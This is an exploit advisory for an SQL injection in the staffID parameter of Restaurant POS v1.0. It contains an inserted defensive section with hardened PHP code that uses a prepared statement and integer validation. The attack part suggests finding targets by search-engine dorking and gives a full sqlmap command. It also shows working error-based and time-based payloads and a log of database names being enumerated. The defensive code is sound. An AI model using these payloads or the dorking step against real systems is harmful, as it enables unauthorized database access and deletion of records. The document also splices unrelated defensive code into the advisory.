## https://sploitus.com/exploit?id=PACKETSTORM:181832
=============================================================================================================================================  
| # Title : Restaurant POS v1.0 SQL injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking In Google Or Other Search Engine.  
  
[+] use payload : admin/deletestaff.php?staffID=1  
  
[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs  
  
  
[+] ---  
GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N  
sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:  
---  
Parameter: staffID (GET)  
Type: error-based  
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)  
Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)  
---  
[22:32:22] [INFO] the back-end DBMS is MySQL  
web application technology: PHP 8.0.30, Apache 2.4.58, PHP  
back-end DBMS: MySQL >= 5.1 (MariaDB fork)  
[22:32:22] [INFO] fetching database names  
[22:32:22] [INFO] starting 7 threads  
[22:32:22] [INFO] retrieved: 'bangresto'  
[22:32:22] [INFO] retrieved: 'cms'  
[22:32:22] [INFO] retrieved: 'phpmyadmin'  
[22:32:22] [INFO] retrieved: 'mysql'  
[22:32:22] [INFO] retrieved: 'test'  
[22:32:22] [INFO] retrieved: 'information_schema'  
[22:32:22] [INFO] retrieved: 'performance_schema'  
available databases [7]:  
[*] bangresto  
  
  
[*] ending @ 22:32:22 /2024-08-16/  
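
The sqlmap output above shows the staffID GET parameter reaching a MySQL query unvalidated, with both an error-based and a time-based technique succeeding. A hardened form of such a delete handler follows as an added example; it is not code from the advisory or from the Restaurant POS project, and the table and column names (tbl_staff, staffID), the credentials and the response messages are assumptions:

```php
<?php
declare(strict_types=1);

// Hypothetical schema (tbl_staff.staffID) and credentials; adjust to the real application.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw exceptions instead of printing SQL errors
ini_set('display_errors', '0');                            // error-based injection relies on visible DB errors

/**
 * Accept only a positive decimal integer. Both payloads in the sqlmap output
 * ("1 AND EXTRACTVALUE(...)" and "1 AND (SELECT ... SLEEP(5) ...)") fail this check.
 */
function parseStaffId(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function deleteStaff(mysqli $db, int $staffId): int
{
    // The value is bound as an integer parameter and never concatenated into the SQL text.
    $stmt = $db->prepare('DELETE FROM tbl_staff WHERE staffID = ?');
    $stmt->bind_param('i', $staffId);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

$staffId = parseStaffId($_GET['staffID'] ?? null);
if ($staffId === null) {
    http_response_code(400);
    exit('Invalid staffID');
}

try {
    $db = new mysqli('127.0.0.1', 'app_user', 'app_password', 'bangresto'); // placeholder credentials
    $deleted = deleteStaff($db, $staffId);
    http_response_code($deleted === 1 ? 200 : 404);
    echo $deleted === 1 ? 'Staff record deleted' : 'No such staff record';
} catch (mysqli_sql_exception $e) {
    error_log('deletestaff: ' . $e->getMessage()); // keep details server-side, return a generic message
    http_response_code(500);
    echo 'Internal error';
}
```

The integer check and the bound parameter are independent layers: either one alone stops the two payloads shown, and suppressing database error output removes the channel the EXTRACTVALUE technique depends on.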
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================